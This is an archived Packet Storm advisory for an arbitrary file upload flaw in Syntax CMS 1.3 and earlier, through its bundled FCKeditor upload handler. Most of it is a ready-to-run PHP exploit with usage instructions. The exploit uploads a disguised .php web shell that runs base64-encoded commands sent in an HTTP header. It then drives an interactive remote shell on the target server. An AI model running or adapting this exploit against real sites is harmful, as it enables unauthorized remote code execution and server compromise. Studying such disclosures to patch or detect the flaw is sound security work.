syntaxcms-upload.txt

2008-05-29T00:00:00
ID PACKETSTORM:66785
Type packetstorm
Reporter Stack
Modified 2008-05-29T00:00:00

Description

                                        
                                            `<?php  
/*  
--------------------------------------------------------------  
Syntax CMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit  
--------------------------------------------------------------  
  
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code  
  
author...: Stack  
mail.....: Ev!L  
descr:  
if the web site change the name of path or path is /public/ you can delet /public/ in the exploit  
in the line :  
"POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php  
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php  
  
41. // Get the posted file.  
42. $oFile = $_FILES['NewFile'] ;  
43.   
44. // Get the uploaded file name and extension.  
45. $sFileName = $oFile['name'] ;  
46. $sOriginalFileName = $sFileName ;  
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;  
48. $sExtension = strtolower( $sExtension ) ;  
49.   
50. // The the file type (from the QueryString, by default 'File').  
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;  
52.   
53. // Check if it is an allowed type.  
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )  
55. SendResults( 1, '', '', 'Invalid type specified' ) ;  
56.   
57. // Get the allowed and denied extensions arrays.  
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;  
59. $arDenied = $Config['DeniedExtensions'][$sType] ;  
60.   
61. // Check if it is an allowed extension.  
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )  
63. SendResults( '202' ) ;  
64.   
65. $sErrorNumber = '0' ;  
66. $sFileUrl = '' ;  
67.   
68. // Initializes the counter used to rename the file, if another one with the same name already exists.  
69. $iCounter = 0 ;  
70.   
71. // The the target directory.  
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )  
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;  
74. else  
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;  
76. $sServerDir = $Config["UserFilesPath"] ;  
77.   
78. while ( true )  
79. {  
80. // Compose the file path.  
81. $sFilePath = $sServerDir . $sFileName ;  
82.   
83. // If a file with that name already exists.  
84. if ( is_file( $sFilePath ) )  
85. {  
86. $iCounter++ ;  
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;  
88. $sErrorNumber = '201' ;  
89. }  
90. else  
91. {  
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;  
93.   
94. if ( is_file( $sFilePath ) )  
95. {  
96. $oldumask = umask(0) ;  
97. chmod( $sFilePath, 0777 ) ;  
98. umask( $oldumask ) ;  
99. }  
100.   
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;  
102.   
103. break ;  
  
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code   
*/  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout", 5);  
function http_send($host, $packet)  
{  
$sock = fsockopen($host, 80);  
while (!$sock)  
{  
print "\n[-] No response from {$host}:80 Trying again...";  
$sock = fsockopen($host, 80);  
}  
fputs($sock, $packet);  
while (!feof($sock)) $resp .= fread($sock, 1024);  
fclose($sock);  
return $resp;  
}  
print "\n+------------------------------------------------------------+";  
print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |";  
print "\n+------------------------------------------------------------+\n";  
if ($argc < 2)  
{  
print "\nUsage......: php $argv[0] host path";  
print "\nExample....: php $argv[0] localhost /Syntax/\n";  
die();  
}  
$host = $argv[1];  
$path = $argv[2];  
$data = "--12345\r\n";  
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";  
$data .= "Content-Type: application/octet-stream\r\n\r\n";  
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";  
$data .= "--12345--\r\n";  
$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Content-Length: ".strlen($data)."\r\n";  
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";  
$packet .= "Connection: close\r\n\r\n";  
$packet .= $data;  
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);  
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");  
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";  
define(STDIN, fopen("php://stdin", "r"));  
while(1)  
{  
print "\nstack-shell# ";  
$cmd = trim(fgets(STDIN));  
if ($cmd != "exit")  
{  
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$output = http_send($host, $packet);  
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");  
$shell = explode("_code_", $output);  
print "\n{$shell[1]}";  
}  
else break;  
}  
?>  
`